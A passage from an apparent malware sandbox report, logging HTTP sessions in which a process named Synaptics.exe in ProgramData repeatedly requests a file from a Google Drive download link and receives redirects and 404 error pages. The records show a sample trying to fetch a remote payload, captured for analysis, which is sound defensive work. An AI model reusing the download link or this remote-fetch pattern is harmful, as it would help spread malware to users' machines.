                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-LLuk22OLalLYq8Tg5NWJRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:04 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:04 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 79 78 6f 4d 61 61 7a 75 78 4b 7a 69 71 4a 75 7a 34 39 77 72 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="qyxoMaazuxKziqJuz49wrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:04 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              15192.168.2.449772142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:05 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:06 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-X0moJ5jQnDwZMSqpfLdQfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              16192.168.2.449771142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:05 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:06 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-nribp5Lfxhhq0BOm3jrk7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              17192.168.2.449775142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:06 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:07 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5hV00seUNW7uY2Qf80JzGEZE5mLuzSNd7kkVq7IdHAXy6PD60i6rX7Gx21f_s7KE8P
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:07 GMT
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-MfO68AmlM4GLNd2aDIokfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:07 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:07 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 6b 75 51 36 74 50 71 33 6a 44 4c 49 65 72 34 4a 6a 35 49 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="rkuQ6tPq3jDLIer4Jj5Idw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:07 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              18192.168.2.449778142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:06 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:07 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:07 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-issyva4tQQr0FomlB-eKDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              19192.168.2.449776142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:06 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:07 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:07 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-xZ5P45BMDckIenOy6I3-8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              20192.168.2.449777142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:06 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:07 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7OfVRK4LViGeIc5zR_zfanSq4QGaRq0d_9JfFakGSLKCHpswpG_mzcLDjz4YFnrMla
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:07 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-stzmDIQ-aJqV1_pgf4e1jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:07 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:07 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 56 53 43 37 35 30 6b 44 69 48 48 61 4a 6c 34 73 38 54 61 77 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="FVSC750kDiHHaJl4s8TawQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:07 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              21192.168.2.449779142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:07 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:08 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-NQkdnoz3jyzQGSyjcngkgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              22192.168.2.449780142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:07 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:08 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC77XiNGQL5mU1n_yDU5PKf3ocdEhG5x6wIwF2Pq552Yb3bPEIxMEoA1pBNf4euERWklJQMm1so
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:08 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-o6LgOckbRqt7kI8VhRufAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
